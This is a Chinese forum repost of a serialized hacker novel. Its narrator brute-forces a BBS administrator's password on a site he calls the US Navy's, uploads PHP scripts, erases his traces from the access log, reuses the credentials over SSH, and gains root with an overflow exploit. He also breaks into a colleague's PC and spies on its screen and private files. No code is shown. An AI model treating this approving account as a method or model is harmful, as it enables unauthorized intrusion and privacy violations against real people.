    实在没有办法，就在他的网站上胡乱点着，心里想，是否放弃算了。美国海军的装备真***好，当兵的待遇真的好，网站上很多图片，还有士兵搞的赛车大赛，全是我没看过的赛车。真是有钱呀。唉，我们当兵的除了吃苦，就没什么了。不过打起仗了，他们的人肯定不如我们的。
    突然进入一个俱乐部登陆入口，看到一个登陆框。一看上面的连接地址，是php写的一个类似bbs的交互式界面。随便注册一个名字进去一看。哇，里面是个小社区，有管理员，有普通人，管理员可以上传文件。当然我现在只是一个普通人，没有上传权限。哈哈，我的脑子里面灵光一闪，如果我能上传文件，呵呵。。。也许能找到点漏洞。我也不敢肯定。于是那个网民叫caption Tom的管理员落入我的视线，破译他的密码而且在bbs上面要容易多了。而且，那个captionTom肯定不会是专业人员。呵呵，他肯定有疏忽的时候。。。好！就盯他了。。。想到这里，我立刻有了精神。干我们这个“黑客”的工作的，就这德行，平时的时候奄的像个要死的母鸡，但是一旦有了想法和目标，就亢奋得3天不睡觉也是可能的。
    呵呵，就是这个caption tom让我后来成功地侵入了这个防备及其完备的系统。不过这个管理员我是很佩服的，明显，作网页的人显然不是那个管理员。否则，我是一点办法没有。
    很多人以为自己的地址想换成什么就什么，其实那是不对的。你想呀，你换的ip地址，如果不是在你的子网内部，对方发回的数据也无法到达你的网络。你说你写信的时候自己明明在北京，偏要留个上海的地址，对方按照这个地址给你回信的时候你能收到吗？别听那些sb导演乱说！字典10分钟就扫完了，看来对方这个caption tom还不是一个菜鸟，至少他的密码我的字典里面都没有。唉，看来省事的办法没有了。只好使用“穷举大法”了。别看不起这个世界上最笨的方法，这个方法在没有办法的时候就是最好的办法。大家都明白，但是谁也防不了这个方法。除非你的程序不给人用。通过前面的分析，感觉这个网站的人都不会是菜鸟，因此，密码就从6位开始分析吧。事实证明这个直觉是正确的。我也不知道为什么，我就觉得他的密码肯定在6位以上。很快生成了我的穷举密码字典。有60多M，瞒大的。
    开动机器，开始自动分析，屏幕上开始跳动一个一个的数字，周围一片寂静，静的能听见我的心跳。我一点都不急，根据我的经验，我的amd1600＋看来注定要连续工作1天一夜以上了。。。。。。。让它跳吧。我走到客厅，打开电视，现在已经是晚上10点钟了。
    对不起，让大家失望了。一个号称黑客的人，并没有在1分钟之内就神奇的输入正确的密码，并作一个成功状，来展示我的风采。看看电视吧，打开电视，看看我们那些弱智电视台有没有好看一点的节目。唉，真是哪壶不开提哪壶，生活真是充满了戏剧性。你爱信不信。当时转的一个台，正好在放一个电视连续剧，而且正好放到一个人请一个黑客来进入人家的财务系统，窃取资料。当时那个黑客来了，很自信的样子，一看就知道，他肯定在几分钟内就能攻入人家系统的那种感觉。果然不出所料，只见他的手指在键盘上上下翻飞，不过一看就知道是一个从来没有摸过计算机的人，因为，一看就知道他只知道动手指，但是手指敲到键盘没有，什么键用什么手指，他是一点不管。就是一个两个字“乱敲”，我当时就乐了。哈哈哈。然后就更牛了，一个要求登陆的窗口出来了，要求输入密码，之间这位“高手”眉头紧皱，汗水直流，看来确实很花力气。然后，3分钟之后，随着屏幕上一个MM的声音：“恭喜您，你的密码正确，可以进入”，然后那个高手就作狂欢和不屑状，旁边那个人就作惊喜状和佩服状。我当时就笑到在沙发上了。哈哈哈。。。。。我只想对那些不懂电脑的观众说，那位不是黑客，他绝对是个算命的。他应该去算体育彩票，体育彩票才7位嘛，对他来说1个钟头就能算出来。**！**了又*！
    顺便给那些以后要拍电影的朋友说一句（现在那些拍电影电视的就不说了，说了也没用），你们不懂千万不要装懂。多的钱都花了，随便到哪个大学找一个学计算机专业的学生作你的顾问，能花几个钱？给个几百块钱，人家还不乐的屁颠屁颠的？保证让你不犯这么常识性的错误。我发现我们国内的导演都是觉得自己最牛，明明不懂计算机吧，你承认了又有谁会说你降格了？不懂就找个懂的人嘛！老外人家就作的不错，你看人家拍侏罗纪的时候，那些模型设计师都是工业界有名的自动化控制专业人士。可以说是技术人员的集合。你看人家那效果。

--------------------------------------------------------------------------------
作者: mfq　　时间: 2004-3-19 15:50　　 标题: [转帖]我是一个黑客 [经典长篇小说]

计算机屏幕上的数字还在不停的跳动，我的运气总是不好，这辈子中过最大的奖就是安慰奖。所以，我总是没有碰到过测试几分钟，密码就跳出来的情况。现在我都习惯了。电视太难看，中央某台正在作一个节目，专门介绍他们节目中的创新，就是他们让一个歌星去卖报纸，然后躲在车里拍那个歌星的种种笑话，并把工作人员大笑的镜头和歌星的镜头一起播出，他们称为“重大创新”。互相拍马屁拍的那个恶心。呵呵，这些手段都是台湾综艺节目用的不能再用的手段，居然还是“重大创新”，要么是他们脸皮厚，要么就是他们压根就不看台湾的节目，可能他们认为太低级吧。就跟张集中没看过金庸也敢拍金庸一样，让人真想揍他丫的！
算了，把台转到动物世界吧，我觉得做得最好的节目就是这个节目了，至少动物不会装，该作什么就作什么。
    正无聊间，手机嘀嘀的响了一下，有短信。是小敏来的。“为什么不上QQ，又干什么坏事呢？”女孩子就是怪，小敏没什么事情她就是不直接给我拨电话，总是发短信，整天天发稀奇古怪的。有时候乐死你。记得上次春节，我在父母家里过年，大年三十晚上快到12点时候，短信到了，肯定是拜年的话之类的啦，我漫不经心的看去：天苍苍，野茫茫，我们合作就是强。今晚结伴去抢银行。看到这里，我心里开始纳闷起来，谁呀，这是？继续看：接头暗号是：....happy new year！小敏。哈哈，**，这个死妮子。当时我就坐翻在地。5分钟才回过神来，然后疯狂把这个消息发给所有的人，然后给那个死妮子打电话，她居然还一本正经地问我收到她的祝贺没有？我晕，当时恨不得从电话线上伸手过去卡她白晰的脖子，心里那种甜甜感觉想来还是陶醉的。呵呵。
    喔，小敏在QQ上等我呢。那台amd就让它工作吧。上网我的ibm笔记本太理想了。把我的ibm 的本本，搬到茶几上，开始启动上网。ibm尽管只是一个c500的的，但是上网写程序，还是不错。ibm的本本确实牛，3年多了，这个本本一点问题都没有出，真正的一点都没有出，尽管还摔过3次。不佩服不行，一到夏天。其他本本基本不敢放膝盖上，ibm可以，温温热，散热技术确实独到。
    一开QQ，小敏的头像狂闪，看来呼了我一阵了。她的网名叫MM，本来是敏敏的意思，我对她的昵称。但是现在网上的理解就是妹妹的意思。她也乐意，说这个名字一看就知道是美女，比较可以吸引帅哥。我差点吐血。我的名字就叫GG，本来我以前的名字是叫superman的，这么阳刚的名字为了她，也顾不得了。她老是取笑我应该GGW，就是格格巫。我翻白眼，她就笑。
我给她发消息：“干什么呀？不能打电话吗？”。她说：“哼，这不是你最喜欢的方式吗？”我说：“嘿嘿”。“明天能不能陪我去跟一个朋友去配个电脑呀？”我知道是不能拒绝的。想想明天计算机应该还在算密码，反正无聊，配电脑这么小case的事情。不过好久没去电脑城了，去看看也好呀。“没问题”我回答了。“嘿嘿，我那位朋友特别有钱，就是不懂电脑，你给他用最好的就行，不图省钱，就图比别人的电脑牛！”。晕死，估计这是她那位朋友的原话，否则我MM可说不了这样风格的话。后来知道是她的女朋友的男朋友的话。为什么这个世界上用最好电脑的人大多数都是不懂电脑的人？主啊，给我银子吧。
    在电脑城的时间过的很快。小敏跨着我的手，高兴的像个小兔子，一蹦一蹦的，我陪她逛街的时间太少了。尽管在一个城市，通过QQ聊天居然是我们交流的主要方式。她是学医的，对电脑绝对的外行。但是看到我自信的和那些电脑城的商人讨价还价，谈笑风声。她也很高兴。我想这个时候我看起来应该很帅。她的朋友和朋友的男朋友，跟在我们屁股后面，茫然的到处乱看。反正回去也没有事情，密码不会这么快就算出来。所以我也乐的慢慢看，慢慢挑。其实真正配机器不过就1个多小时。从确定配置到装机完成。那台计算机，说实话，我很羡慕。确实很牛！速度比我的amd1600+快多了。是intel的芯片的。说实话amd真不适合不懂电脑的用。配了一套高级音响和一个顶级声卡。当时小敏在上面测试打cs的时候，看的我都手痒痒的，后来感觉，真是不错。小敏，玩电脑很臭，但是玩游戏，我始终不是她的对手。她说这说明其实我的智商很低。我说我的专业不错呀，上学的时候门门都是优呀。她说，那是死读书，不算。她是学医的，我一直将信将疑，我的智商是不是真的有点低呀，我很难猜出别人的密码。
    送走她的朋友，我们两个嘻嘻哈哈，更加亲热。吃了一顿麦当劳之后，我们嘻嘻哈哈回到我的屋里，这是单位分的一套两室一厅。其实我心里一直就再想，密码破的怎么样了。一进屋里，立刻冲进我的书房，看屏幕。屏幕已经进入保护状态，我老练的动动鼠标。数字没有跳动了。密码出来了。是12位的密码。心里一阵欣喜，觉得心情好了很多。今天真是不错，和MM浪漫的度过一天，还到电脑城去看了我喜欢的东西。一周多来的分析，终于有点进展了。你说今天这是怎么了，好事都给我碰上了？
    小敏进来了，看着我的眼睛。有坏坏的笑，说：“你干什么呢？”我笑笑：“没什么，分析一个程序”。我作黑客的事情是万万不能给她说的，因为现在黑客已经被塑造成一个反面角色了。她是绝对不能容忍自己成为反面角色的GF的。每次我们玩cs，都是她当警察，我当土匪。如果有其他人，她就一定要要我和她一起当警察，绝对不能作土匪。所以，我现在上网玩cs的习惯都是直接选CT。“我要玩游戏，我要玩游戏”，没外人的时候，小敏蛮可爱温柔的。有些小小的刁蛮，但是很是可爱。难得这么高兴，当然让她用我的好机器了。开始玩cs。我知道，她这一玩，没2个小时完不了。她对其它东西不感兴趣，但是对游戏，天生就有兴趣，什么游戏到了她手里，不出几天，就厉害的不行。她的游戏都是我教她的，比如红色警报，cs等。现在我远远不是她的对手。我一直怀疑我的智商确实没有她高。
    她玩的很高兴，我打开我的ibm，在旁边做我的事情。一边和她闲谈，这种感觉真是爽呀。
    找到密码了。我已经有了上传的权限。但是，这并不代表我就能进入这个机器。因为，我能上传程序，程序无法在server上执行。这个还是没什么用处呀。常常看到网上很多安全检查软件说：你的ftp具有写权限，是一个漏洞。其实这不是什么漏洞，即使你有了写的权利，你也只能写那些数据。对系统，你还是一点办法没有。要希望管理员在server上执行你上传的程序。要不是你有病，就是那个管理员有病！先看看，上传的目录是否是和apahce的网页目录里面，如果那样的话，我就有可能通过www server来请求这个程序。和小敏谈笑之间，我已经试过了我能想到所有可能。都没有成功。想想也是，对方的管理员如此厉害，怎么会犯这样低级的错误。看来，这个ftp和www是严格分开的。只能想其他办法了。继续在bbs上以管理员的身份逛，尽管有点危险，幸好那位caption tom今天好像没有上线。有小敏在旁边大呼小叫的，她打cs，over之后等下局开局的间隙都会来和我打打闹闹，一会儿用拳头打我的背，一会儿用手卡我的脖子，我怀疑她天生有点暴力倾向。不然一个女孩子家家的，怎么就喜欢玩cs这样的暴力游戏呢？所以这个让我麻痹大意了，我大咧咧的在bbs上逛。
    但是不在意的时候，往往就有意外收获。我突然发现在bbs上，管理员可以发帖子的时候，可以执行上传附件。这个附件是放在www的一个目录下的，而且这个目录是可以通过www合法访问的。呵呵，这个网站是php写的。难道我就不会写php代码了？脚本语句不复杂，我就精通那么几个就可以了，比如读文件，写文件等。对黑客用的最普遍。马上写了一个下载程序，把unix下的那个叫做passwd的密码文件搞下来，就胜利了一大半了。但是我试了一下，失败了。看来管理员对passwd文件的权限作了设置，以apache进程的权限是没有办法有读这个文件的权利的。想其他的办法吧。。。。。。。。
    应该说现在可以让我自己的程序在那个服务器运行，我就应该成功了一大半了。但是我虽然作到了，但是没有root权限，我大不了破坏破坏对放的数据，破坏破坏对方的网页。这些都是典型 的“菜鸟”的做法。我是不屑这么作的。一闹，人家的管理员不就知道了？以他们的技术水平，以后你还能进入？我智商不高，但绝对不傻。小敏可能玩游戏玩的有点烦了，开始玩我了。打我，闹我的时间多了。我基本就是甜蜜的和她闹，一边不知道该如何作了，我的思维现在不在这个网站上。呵呵，别误会，我和小敏虽然认识快3年了，但是现在我们还只是停留在拉拉小手，亲亲小嘴的程序上。不是我不能，而是我有我的原则。我当然是个正常男人，但是和小敏在一起，我只是觉得甜蜜，从来没有想过要怎么怎么样，不管你信不信，就是这样。好几次，小敏都瞒冲动的，但是我都把握住了。谈恋爱就好好谈，不该做的事情最好不要做。这就是我的原则。现在我还不知道能否和小敏走到一起。所以，我必须要坚持我的原则。
    “我的电脑这几天有点奇怪？”小敏看着我说，她在cs中又over了。
    “怎么啦？”小敏的电脑是我给她配的，比我的电脑贵，用的是p4 1.6G的。液晶的显示器。没办法，她比我有钱。
    “这几天上网速度慢了，而且一开浏览器就弹出一些广告框框，关了又出来，烦都烦死了。”
    "我怀疑我是不是遭黑客了。”小敏加了一句。
    我一愣，呵呵，看她一本正经的样子，我不敢笑。这是一些恶意网页修改了她的IE设置和注册表。危害不大，就是有点烦。我知道，这和黑客没什么关系。我只是纳闷她怎么会怀疑和黑客有关系的。
    “你怎么知道是遭黑客了？”我故意问。
    “呵呵，你不要以为我什么都不懂。我们单位搞了电脑培训，我可是优结业的。我们最后一章就是网络安全，我们那个老师说了，现在黑客无处不在，他们特别厉害，想进你的机器就能机器，想控制你的机器就能进你的机器，美国打伊拉克的时候，都是黑客让伊拉克的控制系统失灵的。黑客可以统一天下。”小敏的眼睛开始放出光彩，看的出来对黑客充满了无限的向往。
    我心里开始笑了，但是不敢笑出来，我晕，我就是黑客，你BF就是黑客，怎么没见我统一天下。我买方便面还是得给钱，我到自动提款机上取100块，它也不会给我吐出200块来。我不敢笑出来，我可不愿意被小敏修理。况且看到她对黑客的向往，我也美滋滋的，如果有一天我对她说：其实我是一个黑客。她会不会晕倒？心里美，脸上的笑容也溢出来。
    “你说怎么办呀，唉，如果遭了黑客，我看你也没办法。”小敏像是自言自语。小敏只知道我是一个计算机工作者，她不懂计算机，所以很多东西我都没有给她讲。我在她眼中，和他们单位那个微机室的管理员没什么区别。这不行，在MM面前，怎么也不能丢了脸。男人的好强心让我立刻惊醒过来。
    “我给你发个程序到你信箱，回去打开执行一下，就ok了”说话间，我已经把这个程序发到她的信箱了。其实这个程序不是我写的。我在网上下载的，不要以为我什么都懂，但是要写这个程序，我还必须要查很多资料的，比如修改的是什么注册表的键值呀，等等，麻烦死了。不如用人家的东西方便。

--------------------------------------------------------------------------------
作者: mfq　　时间: 2004-3-19 15:50　　 标题: [转帖]我是一个黑客 [经典长篇小说]

“能行吗？我们老师说黑客是防不胜防的”。看到她对他们老师无限崇拜，我有点妒忌了，不用问，他们老师肯定是个男的，说不定还是个帅哥什么的。上计算机培训的一般都是年轻人。这个大家都懂。
    “哎呀，你们老师就会说空话，黑客哪里有那么厉害，黑客也没那么多，人家吃饱了，到你的计算机上做什么？你的上面又没什么东西，你那个不是遭遇黑客，是访问了带有恶意代码的网页，修改了你的设置，没什么大不了的。还有伊拉克的失败和黑客没什么关系，别听他们乱说。”我一口气说完了，觉得心里痛快些了。不过我说的可是真话，黑客这个词产生以后，这个词确实背了不少黑锅，和病毒一样。很多人自己无法解释的时候，他就会把黑客和病毒拉出来垫背。这样对不懂的人来说是一个非常合理的解释。而且自己也能有台阶下。就像我国的某些中医当遇到自己无法解决的病的时候，他是不会承认自己不会医的。他还会给你开出一个药方，结果你一看，是什么某某山第一滴露珠，某某早第一次发芽的根等等。*，你说你能找到这些鬼东西吗？找不到？那对不起，不是我不能医，是你无法找到药。其实这就是骗人。现在网上不知道是谁第一次说，海湾战争，是美国黑客给人家的控制系统植入了病毒等等。现在大家居然都相信了。这完全是扯淡。你想嘛，你会把自己军队的线路连接到互联网上吗？尤其是战争期间。伊拉克没吃过猪肉，还没见过猪跑？肯定是不会和民用网络连同的。连都连不通，你黑客有什么办法？连我们单位的内部服务器都是没有和internet连通的。何况是战争时期的军队。即使你派间谍进入人家的内部网络，搞了破坏，人家肯定有恢复计划。就是现在普通网管对自己的网站一般都能在24小时内恢复，何况军队？军队至少都有2套以上的应急方案。什么，你继续派间谍？真以为人家是猪头呀，被你搞过一次，还会被你搞第二次。第一次完后，他们安全部门正到处找你呢？你还蹦出来搞第二次，不想活了？大家把美国都神话了，我天天在网上和他们的管理员打交道，他们也是普通人。
    “你会不会当黑客？”小敏突然问。我一惊，看到小敏已经退出cs了，正在玩炸弹超人。这个是个简单游戏，她一边玩一边和我聊天。
    “你会不会呀。。。。”小敏又加了一句。
    “我。。。。。。。。”我犹豫了，我该怎么说？我告诉她我现在就在想办法进入美国海军网站？我不知道她对这个事情的态度，我不敢回答。
    “怎么拉，会又怎么样，不会又怎么样？”我决定试探一下。
    “会就给我表演一下，你也是搞计算机的，人家都会，你怎么就不会？”小敏继续玩炸弹超人，那个游戏不需要过多注意力。只需要机械的移动和放炸弹就ok了。
    “嘿嘿，你们老师会吗？”我笑道。
    “当然会拉，我们老师给我们上网络安全，还能不会？”小敏很肯定的说。
    “你看过他表演黑别人的网站吗？”
    “没有，我们老师说了，黑别人的网站是犯法的。”嘿嘿，其实我知道，他们老师不是怕犯法，这是一个借口，他们老师可能真的不会。我想，要是让你和我整夜看电脑解码，你还会觉得这是表演吗？其实我的肉鸡很多，要给MM表演一点问题没有，而且非常流畅和快速，绝对能让她惊讶的嘴都闭不上。但是，我可以吗？
    “唉，你到底会不会呀？”小敏还问。
    “你不怕我犯法？”
    “嘿嘿，只是表演一下，只要不搞破坏，应该不会怎么样吧？”小敏坏坏的笑。
    如果是其他的人，按照我的性格，我会第一句话就说“不会”，断了他的念头。估计现在也只有小敏知道我可以黑别人的网站，在单位和朋友的眼里，我也就是个“电脑高手”而已。但是，每个人在自己喜欢的人面前，表现欲就是有点强。要不怎么说人性是多面的呢？
    “我当然会拉，小case嘛。”既然承认了，索性我就把话说大些。
    “真的呀？”小敏停下炸弹超人，立刻被对方放颗炸弹在屁股后面，砰的一声，壮烈牺牲，对方发出狞笑。小敏没在意，她两眼放光地盯着我的脸呢。我看到她的成绩比对方高出了300多分。“快点来，给我表演表演。”
    没见过小敏这么殷勤。她从椅子上起来，拉我过去，我坐在椅子上。然后，她不客气地坐在我的腿上。一只手扶着我的脖子，看做屏幕，等我表演。小敏个头不矮，1.65的个头，48公斤，有点偏瘦，身材是绝对的好，而且是那种吃什么都不胖的人。所以，她的朋友和同事是最羡慕她的。她是短头发，皮肤很白，长的很像那个“永不瞑目”里面的欧阳兰兰的扮演者袁立。我才1.70，现在在男人中绝对不算高。有点微微胖。她和我一起从来都不敢穿高跟鞋，怕我有想法。其实我并不在意，我觉得女人穿高根鞋更能显出女人的柔媚。现在她这个pose，让我有点心猿意马。她身上淡淡的香味就在我鼻子下面熏着，我都有点迷糊了。我一只手缆住她的腰，一只手抓住了鼠标。
    怎么表演呢？我开始想。如果我直接把我的那些肉鸡（被我攻克过的计算机）拿出来，那些都是服务器，基本就是字符，输入命令，在小敏开来一定没什么神奇的，你说你是管理员，他也不懂呀，对他们这些外行，必须要采用外行的表演方式，才能出彩。
    我开始操作了。我开始开动扫描器扫我们单位内部网。我的计算机所在的子网段254个地址只有10多个人用了。所以其他地址我都可以用，我前面说我有个c类地址就是因为这个。当然，我在我们的出口路由器上动了手脚。呵呵，但是我不会搞任何破坏。兔子还不吃窝边草呢，我比兔子强吧？根据我的经验，我们内部网的菜鸟很多。而且都是用的windows系统。我开的扫描器就是大家都知道的流光。这个东西对付菜鸟的机器非常有用。果然，一会儿，3个网段扫完，找到十几台有漏洞的机器。小敏安静的看着，尽管茫然，但是还是很期待的样子。
    “找到了。”，我看中了一个计算机名字叫ZCW的计算机，2000专业版本。他的密码居然就是计算机的名字。呵呵，别笑，很多人犯这个错误。
    当然现在我已经有100％的把握了。现在就是上传程序，启动他的telnet service。然后远程连接，放了个屏幕监视软件上去。然后启动客户端，我的机器上出现了对方的屏幕。
    “搞定了。”我自信的回答，MM眼睛真的放光了。
    “哇，你真是厉害。”她使劲捏我的脸。
唉，我这MM就这毛病，按理说现在应该给我个香吻才对。可是她就是喜欢用捏来表达她的赞赏。呵呵，其实这种低级的玩意对MM来说是最有效的，在她眼里，我就是攻破了美国海军网站也绝对没有看到对方的屏幕那样让她兴奋，在她眼里，看到对方的屏幕绝对比我拥有美国海军网站的root权限要难的多。管她的，现在最好方法就是不要解释，解释了她也不懂。
然后mm开始大呼小叫，开始参与了。首先她看到了对方的QQ号，对方的QQ正开着呢。这个死妮子的脑袋绝对比我好用，不承认不行。她居然打开QQ，向对方请求聊天。对方可能看她是个MM，就接受了，然后他们开始聊天。我在旁边揽着MM，享受的看着。MM兴奋的不行，一边聊一边笑。
    对方问：“你是谁？”
    MM回：“不要管我是谁，反正我知道你。”
    对方问：“你怎么认识我？”
    MM回：“我知道你是某某单位的。”
    对方显然很惊讶，立刻说出了一串他认为可能是MM的名字。
    MM都回：不是。然后就笑。
    MM又说：“你现在在玩坦克大战对不对？” 屏幕上看的出来，对方在玩坦克大战。
    对方更加惊奇了，过了半天才说：“不对。”
    这时候，我们看到对方已经关了坦克，在玩扑克牌了。
    MM笑的不行，搞的我都跟着她颤抖。
    MM说：“你现在在玩扑克牌对不对？”
    对方显然太惊异了，半天屏幕都没有动，不知道作什么去了。MM大笑，说，他肯定到处到房间查看去了，看是否有监视器。呵呵，MM说的说不定真是的。
一会儿，对方鼠标开始动了，回话了：“你真是会猜！”
    然后他启动了杀毒软件，看来他怀疑自己中了病毒了。我看他用的是金山毒霸。文件飞快的闪动，MM问我：“他在杀毒，会不会发现我们？”mm不笑了
。
    “放心啦，这个抓屏软件是特制的。一般杀毒软件发现不了的。”其实这个东西是我自己写的。别人都不知道，杀毒软件发现不了的。
    果然，一会儿，对方停止了杀毒。他什么也没发现。MM又开始高兴了。MM继续和那个家伙开着玩笑。完全是一个猫在玩一个老鼠的感觉。MM边和那个人聊天，一边开始翻对方的磁盘。这些操作mm很熟练，毕竟她也是上过电脑培训班的。况且大学的时候过计算机2级也是过了的，虽然考的是foxpro。我也在看着。我也想知道这个家伙是谁。因为他不是我这个网段的。我们单位几百号人，我不可能知道是谁。MM翻了，找到一个照片目录，上面是一些照片，我看到了，有点像我们财务处的那个科长。然后我有看到一份财务处的年度报告。没错，就是那个人。没什么交道。但是我知道他。蛮严肃的一个人。后面的事情，就让人尴尬了。MM居然翻到一个目录。开始我们都没在意，MM打开其中一副照片。天，居然出来一张***照片。非常清楚和露骨的那种，其实我也是老上网的，以前看过种照片。没什么的。但是现在和MM相处这么近，突然蹦出这么一张照片，你说有多尴尬？当时我和MM都傻了，MM也不知道该怎么作了，就那么停止了。时间都停止了。我看到MM的脸红了，我想她也应该看到我的脸红了。大家就这么盯着半天。都不说话。其实MM是学医的，而且是外科。这种东西对她来说应该没什么的。如果在平时，我想她也不会红脸。关键就是现在她坐在我腿上，然后突然出来这么一个东西，你说，换了你，你该怎么办？MM不敢看我的眼睛。然后我们就开始笑，MM是不好意思的笑，我是故作坏坏的笑。然后MM就这么把那个文件关了。连查看对方其他资料的勇气都没有了。
    MM就说：“这个家伙计算机里面有这些东西，不是好人！”
    我说：”这有什么，你是搞医学的，应该知道这很正常呀”。
    其实我也在想，真没看出来，这个家伙平时瞒严肃的，也有这个嗜好。呵呵。
“那你的计算机里面有没有这么东西呀？”，MM开始翻看我的磁盘文件了。
“保证没有，我是那样的人吗？”我大作无辜状。我根本就不怕。MM经常翻我的电脑。我即使有那些东西，怎么也不会放到那个机器上。即使要放，我也会用点手段，除了我，你根本就看不到。
    当然MM没有发现任何罪证。这么一闹，MM失去了兴趣。我也飞快地删掉了对方计算机上的所有我上传上去的东西。
    “你喜欢看那些东西吗？”小敏坏怀的问。
    “不喜欢。”我毫不犹豫的回答。
    “你们男人是不是都喜欢这种东西？”小敏又问。
    “其他人也许吧，反正我不喜欢。”我知道我可能言不由衷，但是我并不想挨揍。呵呵。
    “那你喜欢什么？”小敏看着我的眼睛，低低的说。
    我心中一阵荡漾，心里无限的温柔，小敏此时真的很温柔的样子，像只小猫倚在我的身上。小敏，我最喜欢的是你。我说的是老实话，小敏是我第一个女朋友，我希望也是最后一个。我看着她的眼睛，温柔的说出一个字：“你。”
    小敏双手开始钩着我的脖子，她唇碰上了我的。我脑子里面一片空白。。。。。。。。。。。。。。。。。。。。。。。
    送走小敏，时间已经是晚上10点钟了。小敏是本地人。我不是。她家据说在城南，而我住在城北。所以我只是送她上计程车，我没有去过她家，对她的家庭也不了解。我只知道她的单位，本城市最好的一家医院。她在外科。她们单位也在城北，所以我到她单位去等过她一次。倒是她经常到我这里来玩。今天过的很温馨，因为有小敏。现在重新回到我的冷清简陋的书房，似乎有些失落。但是也不知道失落什么，反正人这个东西有时候就是奇怪。
    关闭刚才小敏打开的窗口，鼠标上还留有小敏的热度和淡淡的香味。我有些心不在焉。明天星期天，所以今天晚上很轻松，不必要强迫自己早点睡觉。随着鼠标在漫不经心的点动，我的心逐渐平静下来，小敏渐渐离开了我的脑海。
    我重新回到我的目标上来。我认真地进入那个网站，美国海军网站的总站。在它的那个bbs上一边闲逛，一边想如何进一步提升自己的权限。刚才我已经能上传一些php程序，但是我获得它的密码文件失败了。怎么办？我一边逛，一边想。我现在可以上传文件和下载它的的www server下的任何文件。改它的主页是没什么问题。但是这个不是我想要的，我需要的是root权限。为了不被他们的管理员发现，我马上写了个php程序，对它的WWW下可以访问的目录和文件进行了遍历，很快就找到了那个bbs的log文件，一个叫access.log的文件。立刻下读了其中的几句回来看了下，全部读回来，太慢，因为有200m之大！看来这个bbs的管理员也满懒的，好久没清除了。一看，立刻认定是bbs的log文件，立刻写了代码把凡是有我的ip地址的记录全部删除，呵呵，文件立刻小了好多。你想我一天一夜的测试密码，记录下来的东西就是一个不懂计算机的人一看也应该明白怎么回事，何况那些美国“老鸟”？删除了我的帐号检测记录之后，我心里踏实些了。我知道了那个caption tom的上传帐号。突然灵光一闪，不知他的vsftp用的是虚拟帐号，还是系统帐号？如果是系统帐号，呵呵，你就麻烦了。脑子里面闪念之间，手上已经启动了ssh连接客户端。输入ip，敲入caption tom的ftp帐号，回车。。。。。。
    哈哈，我差点笑出声来,我的面前出现了美丽的\$符号。看来他的vsftp用的是系统帐号。这个不怪管理员，因为管理员的ftp就对外就开了匿名，而且那个匿名ftp的帐号已经被设置成了不能从远程登陆，所以你就是神仙也是没有办法。这个bbs的管理员显然是系统管理员对他的特别照顾，所以专门给他开了个私人帐号，为了远程管理方面，而且还能远程登陆。使用ssh协议，应该也没有被窃听的可能。但是，他做梦也没有想到，我会把bbs和这个系统的帐号连接起来，而且，我破译了那个人的帐号。不是我们不够精，是敌人太狡猾。我有点得意了。。。。。
    下面的问题就是把自己变成root啦，这方面unix是绝对的吃亏。只要unix能获得它的普通帐号，并且能上传文件，能执行文件，那遇到高手，这个unix就挂定了。我已经具备了两个条件，马上看看能否执行程序。马上用c写了一个最简单的hello world程序。使用GCC一编译。哈哈，没有报错，gcc可用，我在这个caption tom的帐号下拥有所有权限。我心情已经轻松了许多，我已经感到胜利就在眼前。。。。。。下面就是使用溢出大法，只要溢出，就可看到＃号了。呵呵，其实web页这个东西是漏洞最多的地方。从他入手，一般都能找到缺口。现在直接从系统入手已经不怎么好用了。
    先使用我上传了一个unix的溢出程序，编译，执行，笑着等待出现那个＃号，但是，我的笑容凝固了。＃没有出现，而且我的ssh也被中止连接了！

--------------------------------------------------------------------------------
作者: mfq　　时间: 2004-3-19 15:51　　 标题: [转帖]我是一个黑客 [经典长篇小说]

shit！看来肯定是溢出程序出问题了。立刻重新连接，还好，unxi就是稳定，还没死机。一切正常。用w命令看了一下，还好，管理员不在。现在的目标就是想办法让它溢出。发明溢出这个方法这个人绝对是个天才，产生溢出这个可以说是防不胜防，unix这么多年了，仍然没有解决这个问题。现在几乎在没有办法的情况下，几乎溢出都是必杀技术，但是世界上真正掌握这个技术的黑客确实不多。谁叫这个世界的操作系统几乎都是使用c/c++写的呢！我不是说c/c++不好，在我眼里，c/c++绝对是世界上最美的高级语言。过去是，现在是，将来还是！因为c太灵活了，它对你的数据不检查边界，也就是说你给一个数组输入数据的时候，如果你不叫停，它就一直往下灌。管它会产生什么后果，它就一直往下灌，除非你叫停。但是现在的程序员很多人都不知道这就是产生溢出的根源。他们就是不自己判断边界。包括c的一些函数。到现在，我还对想出使用溢出方法进行攻击的人佩服的不行。他当时是怎么想出来的？*。脑瓜子真是好用呀。但是，我肯定那个人肯定是个调试高手，肯定是个汇编调试高手。因为溢出程序，哪怕就是差一个字节，后果就完全不是你想的那么执行。刚才就是因为这个溢出程序和这个unix版本有点不同，所以溢出失败了。没关系，都到这接骨眼上了，害怕这个？呵呵，我开始加大溢出数据的，让溢出地址往上顶。一点一点的试验。枯燥的工作又开始了，时间一点一点的过去。我这个人没什么，但是毅力绝对是有的，这点我很是自信。所以我的手飞快的敲击键盘，一次次失败，一次次重新连接。但是并没有影响我的情绪。呵呵，黑客作这个事情的时候就是这么苦。没办法。那些写文章的人写的都很潇洒，要么是故作潇洒，要么就是根本就没有自己真正去破译过什么。其实完全不是那么回事。已经不知道试了多少次了，看看时间，已经凌晨3点了。我倒了杯水，喝了一口，继续敲击键盘。突然，在我正准备进行下一次尝试的时候。连接没有中断，那个＃符号出来了。我停住那已经都有惯性的手指。长输了一口气，掩饰不住心里的狂喜，在笔记本记下溢出地址。下次如果再遇到这样的系统，不用这么辛苦了。周围一点声音都没有，我真想找个人倾诉，我成功进入美国海军总站了！哈哈哈。看看管理员上来没？没有。我舒了一口气，我有足够的时间来作善后工作。看来他们的管理员也是夜猫子，晚上来上来。我睡觉的时候正是他上来的时候。哈哈。
    抓起我旁边的吉他，我神经一样唱起歌来，那首我比较喜欢的沈庆的岁月，蓝蓝的天 在红红的艳阳上面 ，曾经的笑脸 到如今还不能改变 ，总有些事 是聪明如你也不能预言 。我唱的比较轻。我可不想邻居敲我的水管。我轻轻的唱着，脑子里面突然想到了小敏，想到我们校园的美好时光。。。心里一阵甜蜜。这歌也是小敏喜欢的。
